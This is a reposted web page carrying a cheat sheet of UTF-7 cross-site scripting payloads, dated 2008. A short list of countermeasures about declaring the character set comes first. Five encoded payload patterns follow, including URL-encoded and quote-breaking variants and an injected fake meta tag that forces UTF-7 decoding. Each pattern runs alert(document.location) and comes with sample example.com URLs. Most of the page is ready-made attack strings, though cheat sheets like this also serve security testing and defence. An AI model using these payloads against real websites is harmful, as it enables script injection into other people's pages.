UTF-7 XSS Cheat Sheet

2010-02-20 15:44:11 作者:root 来源: 浏览次数:0 网友评论 0

http://openmya.hacker.jp/hasegawa/security/utf7cs.html

UTF-7 XSS Cheat Sheet

#0 Countermeasures

Countermeasures against XSS with UTF-7 are:
  • Specify charset clearly (HTTP header is recommended)
  • Don't place the text attacker can control before <meta>
  • Specify recognizable charset name by browser.
For more information about UTF-7 trick, see "Cross-site scripthing with UTF-7".

#1 Most basic pattern

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
<script>alert(document.location)</script>
Most basic XSS pattern with UTF-7.

#2 URL encoded most basic pattern

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
<script>alert(document.location)</script>
Expression which URL encoded the above.
Example: http://example.com/search?q=%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

#3 With quote

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
"><script>alert(document.location)</script><"
 

#4 URL encoded, with quote

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
"><script>alert(document.location)</script><"
Expression which URL encoded the above.
Example: http://example.com/search?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

#5 Inject fake <meta>

+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>
Inject fake <meta> before original <meta> and force recognize as UTF-7.
<title>
+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
These XSS patterns are tested on IE6 and IE7.
Yosuke HASEGAWA <hasegawa@openmya.hacker.jp>
Last modified: 2008-01-11 
关键词:XSS

相关文章

[收藏] [打印] [关闭] [返回顶部]

  • 验证码:

最新图片文章

最新文章